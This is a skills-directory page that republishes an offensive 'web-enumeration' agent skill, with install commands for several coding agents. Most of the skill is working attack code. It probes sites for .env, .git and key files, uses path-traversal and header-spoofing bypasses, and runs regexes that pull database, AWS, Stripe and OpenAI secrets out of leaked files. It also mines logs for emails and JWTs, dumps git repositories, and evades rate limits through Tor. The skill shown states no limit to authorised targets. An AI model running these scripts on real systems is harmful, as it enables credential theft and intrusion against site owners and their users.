Lint Commit PR
Tresjs/tres
Lint local changes, auto-fix, conventional commit, and optionally create PR
Sensitive file scanning, path traversal bypass, vHost enum, .env extract, log mining, Varnish detect
$ npx skills add uphiago/recon-skills --skill web-enumeration -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install uphiago/recon-skills web-enumeration --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/uphiago/recon-skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/recon/web-enumeration .claude/skills/web-enumeration && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "web-enumeration" agent skill from https://github.com/uphiago/recon-skills/tree/main/recon/web-enumeration into .claude/skills/web-enumeration/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "web-enumeration", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/uphiago/recon-skills/tree/main/recon/web-enumerationType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add uphiago/recon-skills --skill web-enumeration -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install uphiago/recon-skills web-enumeration --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/uphiago/recon-skills.git skills-src && mkdir -p .agents/skills && cp -r skills-src/recon/web-enumeration .agents/skills/web-enumeration && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "web-enumeration" agent skill from https://github.com/uphiago/recon-skills/tree/main/recon/web-enumeration into .agents/skills/web-enumeration/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "web-enumeration", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add uphiago/recon-skills --skill web-enumeration -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install uphiago/recon-skills web-enumeration --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/uphiago/recon-skills.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/recon/web-enumeration .cursor/skills/web-enumeration && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "web-enumeration" agent skill from https://github.com/uphiago/recon-skills/tree/main/recon/web-enumeration into .cursor/skills/web-enumeration/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "web-enumeration", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/uphiago/recon-skills.git --path recon/web-enumeration--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add uphiago/recon-skills --skill web-enumeration -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install uphiago/recon-skills web-enumeration --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/uphiago/recon-skills.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/recon/web-enumeration .gemini/skills/web-enumeration && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "web-enumeration" agent skill from https://github.com/uphiago/recon-skills/tree/main/recon/web-enumeration into .gemini/skills/web-enumeration/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "web-enumeration", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install uphiago/recon-skills web-enumerationInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add uphiago/recon-skills --skill web-enumeration -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/uphiago/recon-skills.git skills-src && mkdir -p .github/skills && cp -r skills-src/recon/web-enumeration .github/skills/web-enumeration && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "web-enumeration" agent skill from https://github.com/uphiago/recon-skills/tree/main/recon/web-enumeration into .github/skills/web-enumeration/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "web-enumeration", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add uphiago/recon-skills --skill web-enumeration -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install uphiago/recon-skills web-enumeration --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/uphiago/recon-skills.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/recon/web-enumeration .opencode/skills/web-enumeration && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "web-enumeration" agent skill from https://github.com/uphiago/recon-skills/tree/main/recon/web-enumeration into .opencode/skills/web-enumeration/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "web-enumeration", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
web-enumerationSensitive file scanning, path traversal bypass, vHost enum, .env extract, log mining, Varnish detect
Web Enumeration is an agent skill from uphiago/recon-skills. Sensitive file scanning, path traversal bypass, vHost enum, .env extract, log mining, Varnish detect
Its SKILL.md is about 2.8k tokens, which your agent loads only when the skill is triggered. The skill folder holds 2 other files, including reference files (for example `references/batch-probe-methodology.md`).
It sits in Security. It works with Git and Vite. The repository describes itself as: Recon & pentest skill pack. CORS, XSS, SQLi, SSRF, RCE, WordPress, MCP, cloud, subdomain takeover, and more. Field-tested. MIT. Full write-up at hiago.sh. The licence is MIT.
4 steps, taken from the step headings in SKILL.md.
Read from SKILL.md and the folder at commit 1260244. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
Shell commands in SKILL.md call:
curlFrom the folder's file list and the shell code blocks in SKILL.md.
Hosts in commands or code, which the agent is likely to contact:
github.comFrom URLs in SKILL.md, links to its own repository left out.
Names these keys or tokens, usually read from environment variables:
DB_PASSWORDAPP_KEYREDIS_PASSWORDMAIL_PASSWORDJWT_SECRETVITE_JWT_SECRETVITE_API_TOKENAWS_KEYACCESS_KEY_IDSECRET_ACCESS_KEYSENDGRID_API_KEYCLIENT_SECRETFrom names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Web Enumeration loads about 2.8k tokens when it runs, and up to ~4.3k if it reads all its reference files. Until then it costs about 29 tokens; SKILL.md has 252 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check noted patterns worth knowing about, such as sudo or a known installer.
ning, path traversal bypass, vHost enum, .env extract, log mining, Varnish detect"- One finding (.env, .git) often leads to full credential access"/.env", "/.env.example", "/.env.production", "/.env.local","/.env.backup", "/.env.bak", "/.env.old", "/.[DEV_ENV]","/.env.staging", "/config/.env","/../.env", "/%2e%2e/.env", "/..%2f.env","/public/../.env", "/storage/../.env", "/html/../.env","/app/../.env", "/www/../.env","/.%00.env", "/.env%00.html", "/.env%23",r = requests.get(f"http://SERVER_IP/.env", headers={"Host": host}, timeout=5)Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from uphiago/recon-skills at commit 1260244, republished under its MIT licence (© uphiago). 252 words, ~2,843 tokens.
.claude/skills/web-enumeration/SKILL.md (or your agent's skills folder). This skill also uses 1 other file; get the full folder from GitHub.import requests
base = "https://target.com"
files = [
"/.env", "/.env.example", "/.env.production", "/.env.local",
"/.env.backup", "/.env.bak", "/.env.old", "/.[DEV_ENV]",
"/.env.staging", "/config/.env",
"/.git/config", "/.git/HEAD", "/.git/index",
"/.git/refs/heads/master", "/.git/logs/HEAD",
"/.git/packed-refs",
"/storage/oauth-private.key", "/storage/oauth-public.key",
"/storage/logs/laravel.log", "/storage/logs/laravel-*.log",
"/storage/framework/views/*",
"/Dockerfile", "/docker-compose.yml", "/docker-compose.override.yml",
"/Procfile", "/.dockerignore",
"/composer.json", "/composer.lock", "/package.json",
"/package-lock.json", "/yarn.lock", "/Gemfile", "/Gemfile.lock",
"/requirements.txt", "/Pipfile", "/Pipfile.lock",
"/Cargo.toml", "/go.mod",
"/artisan", "/server.php", "/web.config",
"/wp-config.php", "/wp-config.php.bak", "/wp-config.php~",
"/wp-content/debug.log", "/readme.html",
"/assets/index-*.js.map", "/build/*.js.map",
"/static/js/*.js.map", "/js/*.js.map",
"/phpinfo.php", "/info.php", "/test.php", "/debug",
"/actuator", "/actuator/env", "/actuator/health",
"/actuator/beans", "/actuator/mappings",
"/actuator/heapdump", "/actuator/loggers",
"/swagger-ui.html", "/swagger-ui/index.html",
"/v2/api-docs", "/v3/api-docs",
"/graphql", "/graphiql", "/playground",
"/admin", "/login", "/dashboard", "/panel",
"/manager/html", "/host-manager/html",
"/robots.txt", "/sitemap.xml",
"/.htaccess", "/nginx.conf", "/.well-known/security.txt",
"/server-status", "/server-info",
"/phpmyadmin", "/_phpmyadmin", "/pma",
]
for f in files:
try:
r = requests.get(f"{base}{f}", timeout=10, allow_redirects=False)
# Catch-all detection: SPA/commerce sites return HTML homepage for any path
body_sample = r.text[:300].lower()
is_catchall_html = any(marker in body_sample
for marker in ['<!doctype', '<html', '<!DOCTYPE'])
if r.status_code == 200 and len(r.text) > 20:
if is_catchall_html and len(r.text) > 500 and not any(
kw in body_sample for kw in
['db_', 'app_', '_key', '_secret', 'password',
'token', 'php version', 'create table']
):
print(f"CATCHALL {f} ({len(r.text)}b) — HTML homepage, not a leak")
else:
print(f"DONE {f} ({len(r.text)}b): {r.text[:150]}")
elif r.status_code == 301 or r.status_code == 302:
print(f"WARN {f} -> redirect {r.status_code}")
elif r.status_code == 401 or r.status_code == 403:
print(f"LOCK {f} -> {r.status_code} (exists, blocked)")
except:
passpaths = [
"/../.env", "/%2e%2e/.env", "/..%2f.env",
"/public/../.env", "/storage/../.env", "/html/../.env",
"/app/../.env", "/www/../.env",
"/.%00.env", "/.env%00.html", "/.env%23",
]
for p in paths:
try:
r = requests.get(f"{base}{p}", timeout=10, allow_redirects=False)
if r.status_code == 200 and ("DB_PASSWORD" in r.text or "APP_KEY" in r.text):
print(f"BYPASS: {p}")
except:
passhosts = ["target.com","www.target.com","admin.target.com","api.target.com","dev.target.com","localhost","127.0.0.1","internal","test"]
for host in hosts:
try:
r = requests.get(f"http://SERVER_IP/.env", headers={"Host": host}, timeout=5)
if "APP_KEY" in r.text or "DB_PASSWORD" in r.text or len(r.text) > 50:
print(f"DONE .env exposed via Host: {host}")
except:
passimport re
env_content = requests.get("http://target/.env", timeout=10).text
patterns = {
"DB_HOST": r"DB_HOST=(.+)",
"DB_DATABASE": r"DB_DATABASE=(.+)",
"DB_USERNAME": r"DB_USERNAME=(.+)",
"DB_PASSWORD": r"DB_PASSWORD=(.+)",
"APP_KEY": r"APP_KEY=(.+)",
"APP_URL": r"APP_URL=(.+)",
"REDIS_HOST": r"REDIS_HOST=(.+)",
"REDIS_PASSWORD": r"REDIS_PASSWORD=(.+)",
"MAIL_USERNAME": r"MAIL_USERNAME=(.+)",
"MAIL_PASSWORD": r"MAIL_PASSWORD=(.+)",
"AWS_KEY": r"AWS_(?:ACCESS_KEY_ID|SECRET_ACCESS_KEY)=(.+)",
"SENDGRID": r"SENDGRID_API_KEY=(.+)",
"SENTRY": r"SENTRY_DSN=(.+)",
"JWT_SECRET": r"JWT_SECRET=(.+)",
"OAUTH": r"OAUTH_(?:CLIENT_ID|CLIENT_SECRET)=(.+)",
"FIREBASE": r"FIREBASE_.+=(.+)",
"OPENAI": r"OPENAI_API_KEY=(.+)",
"STRIPE": r"STRIPE_(?:KEY|SECRET)=(.+)",
}
for name, pattern in patterns.items():
matches = re.findall(pattern, env_content)
for m in matches:
print(f"KEY {name}: {m.strip()}")log = requests.get("http://target/storage/logs/laravel.log", timeout=30).text
emails = set(re.findall(r'[\w.+-]+@[\w-]+\.[\w.-]+', log))
for e in sorted(emails):
if not e.endswith(('.png','.jpg','.svg','.css','.js','.ico','.woff')):
print(f"EMAIL {e}")
sqls = re.findall(r'(?:SQL:|Executing query:|query:)\s*(.*?)(?:\\\\|$)', log)
for s in set(sqls):
if len(s) > 10:
print(f"QUERY {s[:200]}")
jwts = re.findall(r'eyJ[a-zA-Z0-9_\-]{20,}\.[a-zA-Z0-9_\-]{20,}\.[a-zA-Z0-9_\-]{20,}', log)
for j in set(jwts):
print(f"JWT {j[:80]}...")
paths_found = set(re.findall(r'(?:in |at )/(?:[a-zA-Z0-9_\-./]+\.(?:php|js|ts|py|rb))', log))
for p in sorted(paths_found):
print(f"PATH {p}")# Detect cache headers
curl --max-time 30 --connect-timeout 10 -sI "https://TARGET/" | grep -iE "(age|x-cache|via|server)"
# Via: 1.1 varnish = Varnish
# X-Cache: Hit from cloudfront = AWS CloudFront
# Cf-Cache-Status: HIT = Cloudflare
# Varnish Extreme TTL (32 days):
curl --max-time 30 --connect-timeout 10 -sI "https://TARGET/" | grep -iE "age:|max-age|x-cache"OVH Laravel server: .env, .git/config, storage/oauth-private.key all exposed (200 OK). Credentials for MySQL, SendGrid, cloud storage, Firebase.
Government agency Vite dev mode: 45 TypeScript files served publicly with VITE_JWT_SECRET and VITE_API_TOKEN in plain text.
See references/batch-probe-methodology.md for a bounded probe template,
catch-all detection, endpoint-specific CORS checks, and XML-RPC response
classification.
| Issue | Solution |
|---|---|
| Rate limiting | Add 2-6s jitter, rotate Tor circuit |
| CDN blocks paths | Try ports 8443, vHost, direct IP |
| False positives (SPA catch-all) | Check for HTML content (doctype/html tags) — catch-all sites return 200 with homepage for any path |
| Catch-all sites causing false leak flags | Add keyword-level verification: .env must contain DB_/APP_/_KEY/_SECRET; .git/config must contain [core] |
| Redirect follow (-L) on XMLRPC tests | Never use -L for XMLRPC checks — redirects may hide a real 200 POST response |
| Cloudflare/Salesforce catch-all | Some CDNs and commerce platforms return 200 for ANY path with the same homepage — verify by checking /nonexistent-test-path-xyz |
| WAF blocks | Use path traversal bypasses |
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/.env" | head -20
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/.git/HEAD"
# git-dumper: https://github.com/arthaud/git-dumper
./git_dumper.py http://target.com/.git/ /tmp/repo/Find hidden parameters on known endpoints:
# paramspider — finds parameters from Wayback data
paramspider -d target.com -o params.txt
# arjun — discovers hidden parameters via HTTP response comparison
arjun -i backend_urls.txt -o arjun_params.json
arjun -u https://target.com/endpoint -m POST
# x8 — hidden parameter discovery
x8 -u "https://target.com/endpoint" -o x8_params.txt
# Prepare URLs for parameter fuzzing
cat all_urls.txt | grep "=" | qsreplace "FUZZ" | anew param_fuzz.txt
# Deduplicate by parameter name
cat all_urls.txt | grep "=" | sed "s/=[^&]*/=/g" | sort -u > params_clean.txtCategorize discovered URLs by sensitivity to prioritize testing:
# JavaScript files (for secret hunting)
cat all_urls.txt | grep -iE '\.js(\?|$)' | grep -iv '\.json' | sort -u > js_urls.txt
# API endpoints
cat all_urls.txt | grep -Ei '\.(json|xml|graphql)(\?|$)' > api_urls.txt
# Backend scripts
cat all_urls.txt | grep -Ei '\.(php|asp|aspx|jsp|cfm|cgi)(\?|$)' > backend_urls.txt
# Auth/login flows
cat all_urls.txt | grep -Ei "login|signin|auth|oauth|reset|password" > auth_urls.txt
# Admin panels
cat all_urls.txt | grep -Ei "admin|dashboard|internal|manage|panel" > admin_urls.txt
# File upload/download
cat all_urls.txt | grep -Ei "upload|file|download|image|media" > upload_urls.txt
# IDOR candidates
cat all_urls.txt | grep -Ei "[0-9]{3,}" > idor_candidates.txt
# Open redirect candidates
cat all_urls.txt | grep -Ei "redirect|callback|goto|return|dest=|r=|u=|url=" > redirect_urls.txt
# Everything interesting in one shot
cat all_urls.txt | urinteresting# IP header spoofing
ffuf -u https://target.com/blocked-path \
-w 403_bypass_headers.txt \
-H "FUZZ" \
-mc 200,301,302
# Common bypass headers
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/admin" \
-H "X-Forwarded-For: 127.0.0.1" \
-H "X-Forwarded-Host: 127.0.0.1" \
-H "X-Custom-IP-Authorization: 127.0.0.1" \
-H "X-Original-URL: /admin" \
-H "X-Rewrite-URL: /admin"
# HTTP method switching
for method in GET POST PUT PATCH DELETE OPTIONS HEAD TRACE; do
echo -n "$method: "
curl --max-time 30 --connect-timeout 10 -sk -X "$method" "https://target.com/admin" -o /dev/null -w "%{http_code}"
echo
done
# Path override techniques
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/anything" -H "X-Original-URL: /admin"
curl --max-time 30 --connect-timeout 10 -sk "https://target.com/anything" -H "X-Rewrite-URL: /admin"# Robots.txt history via roboxtractor
cat alive_subs.txt | roboxtractor -m 1 -wb
# Recover 404 pages via Wayback Machine
waybackurls https://target.com | grep "webstat\|/old/\|/v1/\|/deprecated" > old_pages.txt
# For each old page, re-crawl linked resources
gospider -s https://target.com -a -r \
| grep -oE 'https?://[^[:space:]"]+' \
| grep "/old-path/"
# Google Sheets leak hunting
# site:*.target.com intext:"docs.google.com/spreadsheets"
# site:docs.google.com/spreadsheets "target.com" "password"
# GitHub endpoints: find internal API paths in repos
github-endpoints -q -k -d target.com -t $GITHUB_TOKEN© uphiago, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
SKILL.md and 1 other file (references) in recon/web-enumeration of uphiago/recon-skills.
Open the folder on GitHubat commit 1260244
Web Enumeration next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Web Enumeration this skilluphiago/recon-skills | 1.3k | — | ~2.8k | Automated safety check: Notes | MIT | |
| Lint Commit PRTresjs/tres | 3.8k | — | ~1.1k | Automated safety check: Pass | MIT | |
| Playwright Component Testingmellowagain/gitarena | 114 | 1 repos | ~2.6k | Automated safety check: Pass | MIT | |
| Pi Extension DevelopmentHazAT/pi-config | 451 | — | ~1.5k | Automated safety check: Pass | MIT | |
| Investigate Issueanalogjs/analog | 3.2k | — | ~2k | Automated safety check: Pass | MIT | |
| Version Bump and ReleaseescapeWu/perplexity-ai | 169 | — | ~528 | Automated safety check: Pass | MIT |
Tresjs/tres
Lint local changes, auto-fix, conventional commit, and optionally create PR
mellowagain/gitarena
Set up component testing with Playwright using a story gallery — scaffold stories and a gallery dev page driven by the built-in mount fixture, no dedicated component-testing runtime.
HazAT/pi-config
Defines the local standard for standalone Pi extension repositories.
analogjs/analog
Investigate a GitHub issue end to end — reproduce the reporter's repo or code snippet in an isolated sandbox outside the monorepo, trace the root cause in the source, and draft a reply back to the…
escapeWu/perplexity-ai
Bumps a project version, updates both changelogs, builds the frontend, then commits, tags and pushes the release.
pddzl/td27-admin
Generate clear and conventional commit messages from git diffs
uphiago/recon-skills
Flags API endpoints whose data or actions look like they should need a login but currently don't, as part of authorized security testing.
uphiago/recon-skills
Mine errorlog for creds, paths, SQL when leak hunt finds. An agent skill from uphiago/recon-skills.
uphiago/recon-skills
Analyze JS bundles and source maps for hardcoded secrets, API keys, JWTs, and internal endpoints
uphiago/recon-skills
A skill your agent uses when starting or restructuring an authorized external web and API assessment.
uphiago/recon-skills
A skill your agent uses when protected HTTP routes return 401 or 403.
uphiago/recon-skills
Map organization IP infrastructure via ASN, CIDR, TLD expansion, and reverse DNS.
Categories
Sensitive file scanning, path traversal bypass, vHost enum, .env extract, log mining, Varnish detect. Web Enumeration is an agent skill from uphiago/recon-skills.
Web Enumeration fits situations like: security work in your project.
Run `npx skills add uphiago/recon-skills --skill web-enumeration -a claude-code`. Or copy the skill folder (recon/web-enumeration in uphiago/recon-skills) into .claude/skills/web-enumeration in your project. Claude Code loads it when a task matches its description.
Run `npx skills add uphiago/recon-skills --skill web-enumeration -a codex`. Or copy the skill folder (recon/web-enumeration in uphiago/recon-skills) into .agents/skills/web-enumeration in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add uphiago/recon-skills --skill web-enumeration -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/web-enumeration, .gemini/skills/web-enumeration, .github/skills/web-enumeration and .opencode/skills/web-enumeration in your project.
Going by SKILL.md and its folder, Web Enumeration needs the command-line tools its instructions call (curl) and credentials named DB_PASSWORD, APP_KEY, REDIS_PASSWORD and MAIL_PASSWORD. Our summary lists: Python 3; Docker; A credential in APP_KEY; A credential in AWS_KEY.
SKILL.md names 1 domain. In commands or code: github.com; the agent is likely to contact it when it follows the instructions. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found notes only (mentions a .env file), nothing it rates as a warning. It is not a guarantee. Review the folder before installing.
Web Enumeration is published under the MIT licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.
About 2.8k tokens (SKILL.md is roughly 11k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 1.4k tokens, read only when the agent opens those files.
Skills that share tags, products or a category with Web Enumeration: Lint Commit PR (Tresjs/tres, 3.8k stars), Playwright Component Testing (mellowagain/gitarena, 114 stars), Pi Extension Development (HazAT/pi-config, 451 stars) and Investigate Issue (analogjs/analog, 3.2k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
uphiago (a GitHub user) maintains it in uphiago/recon-skills, which has 1,294 GitHub stars. The repository holds 23 skills in this directory. The repository was last updated on September 1, 2026.
Source: uphiago/recon-skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.